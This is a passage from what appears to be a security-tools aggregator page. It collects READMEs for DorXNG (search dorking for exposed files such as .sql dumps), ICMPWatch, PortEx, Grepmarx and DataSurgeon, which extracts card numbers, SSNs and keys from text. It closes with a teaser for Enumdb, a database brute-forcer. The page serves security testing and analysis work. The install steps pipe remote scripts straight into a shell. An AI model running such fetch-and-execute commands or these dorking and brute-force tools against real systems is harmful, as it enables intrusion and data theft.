The more recursions your command goes through without returning to main the more memory the process will consume. You may come back to find that the process has crashed with a Killed error message. If this happens your machine ran out of memory and killed the process. Not to worry though... Your database file is still good. 

If your database file gets exceptionally large it inevitably slows down the program and consumes more memory with each iteration...

Those Python Stack Frames are Thicc... ο‘ο˜…

We've seen a marked drop in performance with database files that exceed approximately 50 thousand entries.

The --limitdatabase option has been implemented to mitigate some of these memory consumption issues. Use it in combination with --loop to break deep recursive iteration inside iterator.py and restart from main right where you left off.

Once you have a series of database files you can merge them all (one at a time) with --mergedatabase. You can even merge them all into a new database file if you specify an unused filename with --database.

DO NOT merge data into a database that is currently being used by a running DorXNG process. This may cause errors and could potentially corrupt the database.

The included query.lst file is every dork that currently exists on the Google Hacking Database (GHDB). See: ghdb_scraper.py

We've already run through it for you... ο˜‰ Our ghdb.db file contains over one million entries and counting!  You can download it here ghdb.db if you'd like a copy. ο˜‰

Example of querying the ghdb.db database:

./DorXNG.py -d ghdb.db -D '^http.*\.sql$'

A rewrite of DorXNG in Golang is already in the works. ο˜‰ (GorXNG? | DorXNGNG?) ο˜†

We're gonna need more dorks... ο˜… Check out DorkGPT ο‘€

Examples ο’‘

Single Search Query

./DorXNG.py -q 'search query'

Concurrent Search Queries

./DorXNG.py -q 'search query' -c4

Page Iteration Mode

./DorXNG.py -q 'search query' -n4

Iterative Concurrent Search Queries

./DorXNG.py -q 'search query' -c4 -n64

Server List Iteration Mode

./DorXNG.py -S server.lst -q 'search query' -c4 -n64 -t0

Query List Iteration Mode

./DorXNG.py -Q query.lst -c4 -n64

Query and Server List Iteration

./DorXNG.py -S server.lst -Q query.lst -c4 -n64 -t0

Main Function Loop Iteration Mode

./DorXNG.py -S server.lst -Q query.lst -c4 -n64 -t0 -L4

Infinite Main Function Loop Iteration Mode with a Database File Size Limit Set to 10k Entries

./DorXNG.py -S server.lst -Q query.lst -c4 -n64 -t0 -L0 -l10

Merging a Database (One at a Time) into a New Database File

./DorXNG.py -d new-database.db -m dorxng.db

Merge All Database Files in the Current Working Directory into a New Database File

for i in `ls *.db`; do ./DorXNG.py -d new-database.db -m $i; done

Query a Database

./DorXNG.py -d new-database.db -D 'regex search string'


ICMPWatch - ICMP Packet Sniffer

By: Zion3R


ICMP Packet Sniffer is a Python program that allows you to capture and analyze ICMP (Internet Control Message Protocol) packets on a network interface. It provides detailed information about the captured packets, including source and destination IP addresses, MAC addresses, ICMP type, payload data, and more. The program can also store the captured packets in a SQLite database and save them in a pcap format.


Features

  • Capture and analyze ICMP Echo Request and Echo Reply packets.
  • Display detailed information about each ICMP packet, including source and destination IP addresses, MAC addresses, packet size, ICMP type, and payload content.
  • Save captured packet information to a text file.
  • Store captured packet information in an SQLite database.
  • Save captured packets to a PCAP file for further analysis.
  • Support for custom packet filtering based on source and destination IP addresses.
  • Colorful console output using ANSI escape codes.
  • User-friendly command-line interface.

Requirements

  • Python 3.7+
  • scapy 2.4.5 or higher
  • colorama 0.4.4 or higher

Installation

  1. Clone this repository:
git clone https://github.com/HalilDeniz/ICMPWatch.git
  1. Install the required dependencies:
pip install -r requirements.txt

Usage

python ICMPWatch.py [-h] [-v] [-t TIMEOUT] [-f FILTER] [-o OUTPUT] [--type {0,8}] [--src-ip SRC_IP] [--dst-ip DST_IP] -i INTERFACE [-db] [-c CAPTURE]
  • -v or --verbose: Show verbose packet details.
  • -t or --timeout: Sniffing timeout in seconds (default is 300 seconds).
  • -f or --filter: BPF filter for packet sniffing (default is "icmp").
  • -o or --output: Output file to save captured packets.
  • --type: ICMP packet type to filter (0: Echo Reply, 8: Echo Request).
  • --src-ip: Source IP address to filter.
  • --dst-ip: Destination IP address to filter.
  • -i or --interface: Network interface to capture packets (required).
  • -db or --database: Store captured packets in an SQLite database.
  • -c or --capture: Capture file to save packets in pcap format.

Press Ctrl+C to stop the sniffing process.

Examples

  • Capture ICMP packets on the "eth0" interface:
python icmpwatch.py -i eth0
  • Sniff ICMP traffic on interface "eth0" and save the results to a file:
python dnssnif.py -i eth0 -o icmp_results.txt
  • Filtering by Source and Destination IP:
python icmpwatch.py -i eth0 --src-ip 192.168.1.10 --dst-ip 192.168.1.20
  • Filtering ICMP Echo Requests:
python icmpwatch.py -i eth0 --type 8
  • Saving Captured Packets
python icmpwatch.py -i eth0 -c captured_packets.pcap


PortEx - Java Library To Analyse Portable Executable Files With A Special Focus On Malware Analysis And PE Malformation Robustness


PortEx is a Java library for static malware analysis of Portable Executable files. Its focus is on PE malformation robustness, and anomaly detection. PortEx is written in Java and Scala, and targeted at Java applications.

Features

  • Reading header information from: MSDOS Header, COFF File Header, Optional Header, Section Table
  • Reading PE structures: Imports, Resources, Exports, Debug Directory, Relocations, Delay Load Imports, Bound Imports
  • Dumping of sections, resources, overlay, embedded ZIP, JAR or .class files
  • Scanning for file format anomalies, including structural anomalies, deprecated, reserved, wrong or non-default values.
  • Visualize PE file structure, local entropies and byteplot of the file with variable colors and sizes
  • Calculate Shannon Entropy and Chi Squared for files and sections
  • Calculate ImpHash and Rich and RichPV hash values for files and sections
  • Parse RichHeader and verify checksum
  • Calculate and verify Optional Header checksum
  • Scan for PEiD signatures, internal file type signatures or your own signature database
  • Scan for Jar to EXE wrapper (e.g. exe4j, jsmooth, jar2exe, launch4j)
  • Extract Unicode and ASCII strings contained in the file
  • Extraction and conversion of .ICO files from icons in the resource section
  • Extraction of version information and manifest from the file
  • Reading .NET metadata and streams (Alpha)

For more information have a look at PortEx Wiki and the Documentation

PortexAnalyzer CLI and GUI

PortexAnalyzer CLI is a command line tool that runs the library PortEx under the hood. If you are looking for a readily compiled command line PE scanner to analyse files with it, download it from here PortexAnalyzer.jar

The GUI version is available here: PortexAnalyzerGUI

Using PortEx

Including PortEx to a Maven Project

You can include PortEx to your project by adding the following Maven dependency:

<dependency>
<groupId>com.github.katjahahn</groupId>
<artifactId>portex_2.12</artifactId>
<version>4.0.0</version>
</dependency>

To use a local build, add the library as follows:

<dependency>
<groupId>com.github.katjahahn</groupId>
<artifactId>portex_2.12</artifactId>
<version>4.0.0</version>
<scope>system</scope>
<systemPath>$PORTEXDIR/target/scala-2.12/portex_2.12-4.0.0.jar</systemPath>
</dependency>

Including PortEx to an SBT project

Add the dependency as follows in your build.sbt

libraryDependencies += "com.github.katjahahn" % "portex_2.12" % "4.0.0"

Building PortEx

Requirements

PortEx is build with sbt

Compile and Build With sbt

To simply compile the project invoke:

$ sbt compile

To create a jar:

$ sbt package

To compile a fat jar that can be used as command line tool, type:

$ sbt assembly

Create Eclipse Project

You can create an eclipse project by using the sbteclipse plugin. Add the following line to project/plugins.sbt:

addSbtPlugin("com.typesafe.sbteclipse" % "sbteclipse-plugin" % "2.4.0")

Generate the project files for Eclipse:

$ sbt eclipse

Import the project to Eclipse via the Import Wizard.

Donations

I develop PortEx and PortexAnalyzer as a hobby in my freetime. If you like it, please consider buying me a coffee: https://ko-fi.com/struppigel

Author

Karsten Hahn

Twitter: @Struppigel

Mastodon: struppigel@infosec.exchange

Youtube: MalwareAnalysisForHedgehogs



Grepmarx - A Source Code Static Analysis Platform For AppSec Enthusiasts


Grepmarx is a web application providing a single platform to quickly understand, analyze and identify vulnerabilities in possibly large and unknown code bases.

Features

SAST (Static Analysis Security Testing) capabilities:

  • Multiple languages support: C/C++, C#, Go, HTML, Java, Kotlin, JavaScript, TypeScript, OCaml, PHP, Python, Ruby, Bash, Rust, Scala, Solidity, Terraform, Swift
  • Multiple frameworks support: Spring, Laravel, Symfony, Django, Flask, Node.js, jQuery, Express, Angular...
  • 1600+ existing analysis rules
  • Easily extend analysis rules using Semgrep syntax: https://semgrep.dev/editor
  • Manage rules in rule packs to tailor code scanning

SCA (Software Composition Analysis) capabilities:

  • Multiple package-dependency formats support: NPM, Maven, Gradle, Composer, pip, Gopkg, Gem, Cargo, NuPkg, CSProj, PubSpec, Cabal, Mix, Conan, Clojure, Docker, GitHub Actions, Jenkins HPI, Kubernetes
  • SBOM (Software Bill-of-Materials) generation (CycloneDX compliant)

Extra

  • Analysis workbench designed to efficiently browse scan results
  • Scan code that doesn't compile
  • Comprehensive LOC (Lines of Code) counter
  • Inspector: automatic application features discovery
  • ... and a Dark Mode

Screenshots

Scan customization Analysis workbench Rule pack edition

Execution

Grepmarx is provided with a configuration to be executed in Docker and Gunicorn.

Docker execution


Make sure you have docker-composer installed on the system, and the docker daemon is running. The application can then be easily executed in a docker container. The steps:

Get the code

$ git clone https://github.com/Orange-Cyberdefense/grepmarx.git
$ cd grepmarx

Start the app in Docker

$ sudo docker-compose pull && sudo docker-compose build && sudo docker-compose up -d

Visit http://localhost:5000 in your browser. The app should be up & running.

Note: a default user account is created on first launch (user=admin / password=admin). Change the default password immediately.

Gunicorn


Gunicorn 'Green Unicorn' is a Python WSGI HTTP Server for UNIX. A supervisor configuration file is provided to start it along with the required Celery worker (used for security scans queuing).

Install using pip

$ pip install gunicorn supervisor

Start the app using gunicorn binary

$ supervisord -c supervisord.conf

Visit http://localhost:8001 in your browser. The app should be up & running.

Note: a default user account is created on first launch (user=admin / password=admin). Change the default password immediately.

Build from sources

Get the code

$ git clone https://github.com/Orange-Cyberdefense/grepmarx.git
$ cd grepmarx

Install virtualenv modules

$ virtualenv env
$ source env/bin/activate

Install Python modules

PostgreSQL connector (Production) $ # pip install -r requirements-pgsql.txt" dir="auto">
$ # SQLite Database (Development)
$ pip3 install -r requirements.txt
$ # OR with PostgreSQL connector (Production)
$ # pip install -r requirements-pgsql.txt

Install additionnal requirements

# Dependency scan (cdxgen / depscan) requirements
$ sudo apt install npm openjdk-17-jdk maven gradle golang composer
$ sudo npm install -g @cyclonedx/cdxgen
$ pip install appthreat-depscan

A Redis server is required to queue security scans. Install the redis package with your favorite distro package manager, then:

$ redis-server

Set the FLASK_APP environment variable

$ export FLASK_APP=run.py
$ # Set up the DEBUG environment
$ # export FLASK_ENV=development

Start the celery worker process

$ celery -A app.celery_worker.celery worker --pool=prefork --loglevel=info --detach

Start the application (development mode)

$ # --host=0.0.0.0 - expose the app on all network interfaces (default 127.0.0.1)
$ # --port=5000 - specify the app port (default 5000)
$ flask run --host=0.0.0.0 --port=5000

Access grepmarx in browser: http://127.0.0.1:5000/

Note: a default user account is created on first launch (user=admin / password=admin). Change the default password immediately.

Credits & Links



Grepmarx - Provided by Orange Cyberdefense.



DataSurgeon - Quickly Extracts IP's, Email Addresses, Hashes, Files, Credit Cards, Social Secuirty Numbers And More From Text


Β DataSurgeon (ds) is a versatile tool designed for incident response, penetration testing, and CTF challenges. It allows for the extraction of various types of sensitive information including emails, phone numbers, hashes, credit cards, URLs, IP addresses, MAC addresses, SRV DNS records and a lot more!

  • Supports Windows, Linux and MacOS

Extraction Features

  • Emails
  • Files
  • Phone numbers
  • Credit Cards
  • Google API Private Key ID's
  • Social Security Numbers
  • AWS Keys
  • Bitcoin wallets
  • URL's
  • IPv4 Addresses and IPv6 addresses
  • MAC Addresses
  • SRV DNS Records
  • Extract Hashes
    • MD4 & MD5
    • SHA-1, SHA-224, SHA-256, SHA-384, SHA-512
    • SHA-3 224, SHA-3 256, SHA-3 384, SHA-3 512
    • MySQL 323, MySQL 41
    • NTLM
    • bcrypt

Want more?

Please read the contributing guidelines here

Quick Install

Install Rust and Github

Linux

wget -O - https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.sh | bash

Windows

Enter the line below in an elevated powershell window.

IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.ps1")

Relaunch your terminal and you will be able to use ds from the command line.

Mac

curl --proto '=https' --tlsv1.2 -sSf https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.sh | sh

Command Line Arguments



Video Guide

Examples

Extracting Files From a Remote Webiste

Here I use wget to make a request to stackoverflow then I forward the body text to ds . The -F option will list all files found. --clean is used to remove any extra text that might have been returned (such as extra html). Then the result of is sent to uniq which removes any non unique files found.

 wget -qO - https://www.stackoverflow.com | ds -F --clean | uniq


Extracting Mac Addresses From an Output File

Here I am pulling all mac addresses found in autodeauth's log file using the -m query. The --hide option will hide the identifer string infront of the results. In this case 'mac_address: ' is hidden from the output. The -T option is used to check the same line multiple times for matches. Normallly when a match is found the tool moves on to the next line rather then checking again.

$ ./ds -m -T --hide -f /var/log/autodeauth/log     
2023-02-26 00:28:19 - Sending 500 deauth frames to network: BC:2E:48:E5:DE:FF -- PrivateNetwork
2023-02-26 00:35:22 - Sending 500 deauth frames to network: 90:58:51:1C:C9:E1 -- TestNet

Reading all files in a directory

The line below will will read all files in the current directory recursively. The -D option is used to display the filename (-f is required for the filename to display) and -e used to search for emails.

$ find . -type f -exec ds -f {} -CDe \;


Speed Tests

When no specific query is provided, ds will search through all possible types of data, which is SIGNIFICANTLY slower than using individual queries. The slowest query is --files. Its also slightly faster to use cat to pipe the data to ds.

Below is the elapsed time when processing a 5GB test file generated by ds-test. Each test was ran 3 times and the average time was recorded.

Computer Specs

Processor	Intel(R) Core(TM) i5-10400F CPU @ 2.90GHz, 2904 Mhz, 6 Core(s), 12 Logical Processor(s)
Ram 12.0 GB (11.9 GB usable)

Searching all data types

Command Speed
cat test.txt | ds -t 00h:02m:04s
ds -t -f test.txt 00h:02m:05s
cat test.txt | ds -t -o output.txt 00h:02m:06s

Using specific queries

Command Speed Query Count
cat test.txt | ds -t -6 00h:00m:12s 1
cat test.txt | ds -t -i -m 00h:00m:22 2
cat test.txt | ds -tF6c 00h:00m:32s 3

Project Goals

  • JSON and CSV output
  • Untar/unzip and a directorty searching mode
  • Base64 Detection and decoding


Top 5 Critical CVEs Vulnerability from 2019 That Every CISO Must Patch Before He Gets Fired !

The number of vulnerabilities continues to increase so much that the technical teams in charge of the patch management find themselves drowning in a myriad of critical and urgent tasks. Therefore we have taken the time to review the profile of the most critical vulnerabilities & issues that impacted year 2019. After this frenzy during [&hellip

Enumdb Beta – Brute Force MySQL and MSSQL Databases

Enumdb is brute force and post exploitation tool for MySQL and MSSQL databases. When provided a list of usernames and/or passwords, it will cycle through each looking for valid credentials. By...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]
❌